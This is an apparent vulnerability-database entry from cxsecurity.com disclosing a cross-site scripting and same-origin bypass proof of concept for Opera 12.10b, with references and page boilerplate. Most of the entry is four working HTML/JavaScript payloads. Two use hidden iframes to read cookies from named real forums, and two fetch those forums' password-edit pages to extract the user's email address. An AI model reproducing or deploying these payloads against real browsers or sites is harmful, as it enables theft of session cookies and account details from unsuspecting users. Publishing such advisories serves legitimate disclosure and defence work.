Opera 12.10b Cross Site Scripting 0day PoC (CSRF) *youtube

2012-10-13 / 2012-10-29
Credit: M_script
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

<script> if(document.domain == 'tinyurl.com') location.reload(); function xss() { alert(document.frames[0].document.cookie); } function ifrAdd() { var ifr = document.createElement('iframe'); ifr.style = 'width:0px;height:0px;visibility:hidden'; ifr.src = 'http'; ifr.src += document.referrer.length ? '' : 's'; ifr.src += '://forum.antichat.ru/css/a.css'; ifr.onload = function(){xss()}; document.body.appendChild(ifr); } </script> <body onload=ifrAdd()> ========================================================== <script> if(document.domain == 'tinyurl.com') location.reload(); function xss() { alert(document.frames[0].document.cookie); } function ifrAdd() { var ifr = document.createElement('iframe'); ifr.style = 'width:0px;height:0px;visibility:hidden'; ifr.src = 'https://rdot.org/forum/clientscript/vbulletin_read_marker.js'; ifr.onload = function(){xss()}; document.body.appendChild(ifr); } </script> <body onload=ifrAdd()> ========================================================== <script> if(document.domain == 'tinyurl.com') location.reload(); function getMail() { var x = new XMLHttpRequest; x.open('GET', 'http' + (document.referrer.length ? '' : 's') + '://forum.antichat.ru/profile.php?do=editpassword', false); x.send(null); alert(x.responseText.match(/name="email" value="(.+?)"/)[1]); } </script> <body onload=getMail()> ========================================================== <script> if(document.domain == 'tinyurl.com') location.reload(); function getMail() { var x = new XMLHttpRequest; x.open('GET', 'https://rdot.org/forum/profile.php?do=editpassword', false); x.send(null); alert(x.responseText.match(/name="email" value="(.+?)"/)[1]); } </script> <body onload=getMail()> ==========================================================

References:

http://www.youtube.com/watch?v=txExYHPOGR0
http://cxsecurity.com/issue/WLB-2012100086
http://cxsecurity.com/issue/WLB-2012100252
https://rdot.org/forum/showthread.php?t=2444


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top